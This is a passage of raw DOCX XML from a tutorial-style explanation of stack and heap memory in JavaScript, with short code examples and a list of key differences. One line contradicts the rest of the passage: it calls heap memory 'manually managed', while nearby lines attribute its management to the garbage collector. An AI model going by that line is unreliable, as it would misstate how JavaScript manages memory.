          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The lifetime of stack variables is limited to the duration of the function or block in which they are defined.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F6E9C0" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example in JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50723826" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In JavaScript, stack memory is used for function calls and local variables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F788E4" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51"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exampleFunction() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014B67E0" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51"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let localVariable = 'Hello'; // Allocated on the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DCB612" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51"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console.log(localVariable);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6241A522" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51"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B68F16E" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51"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exampleFunction(); // Stack memory used for localVariable is freed after function returns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5402C7E6" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Heap Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BBB293" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Heap memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used for dynamic memory allocation, where memory is allocated and freed at runtime. It is used for objects and data structures that need to persist beyond the scope of a single function call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BE7A16" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Characteristics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265E58D0" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="261"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Size</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C81ED99" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="261"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Heap memory is generally larger compared to stack memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F84B0E0" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="261"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>It can grow and shrink dynamically as needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508282F6" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="261"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Allocation/Deallocation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E70A15" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="261"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Allocation and deallocation are slower compared to stack memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7AA4FD" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="261"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Memory management is handled by the garbage collector (in JavaScript engines like V8), which automatically reclaims memory that is no longer in use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F186430" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="261"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C85D07" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="261"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Heap memory is used for objects and data structures that need to persist beyond function or block scopes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A5BC59" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="261"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Memory is manually managed and can be accessed from anywhere in the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B375DE6" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="261"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Lifetime</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261A29E8" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="261"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The lifetime of heap objects is managed by the garbage collector. Objects remain in memory as long as there are references to them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C66B98" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example in JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1A768A" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In JavaScript, heap memory is used for objects, arrays, and other complex data structures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3EAA24" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51"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obj = { name: 'John', age: 30 }; // Allocated on the heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52120C15" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51"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console.log(obj.name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196655C7" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05F56619" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51"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 The object remains in memory as long as 'obj' is referenced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325A8667" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Differences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E2F588" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF2539F" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stack Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Automatically managed; local variables are cleaned up when functions return.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317EE636" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Heap Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Managed by the garbage collector; memory is reclaimed when there are no more references to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C526B60" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Allocation/Deallocation Speed</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EE1FD6" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stack Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Fast allocation and deallocation due to the simple LIFO mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A482631" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Heap Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Slower allocation and deallocation due to the need for garbage collection and dynamic memory management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEDEA48" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Size</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E41CD1B" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
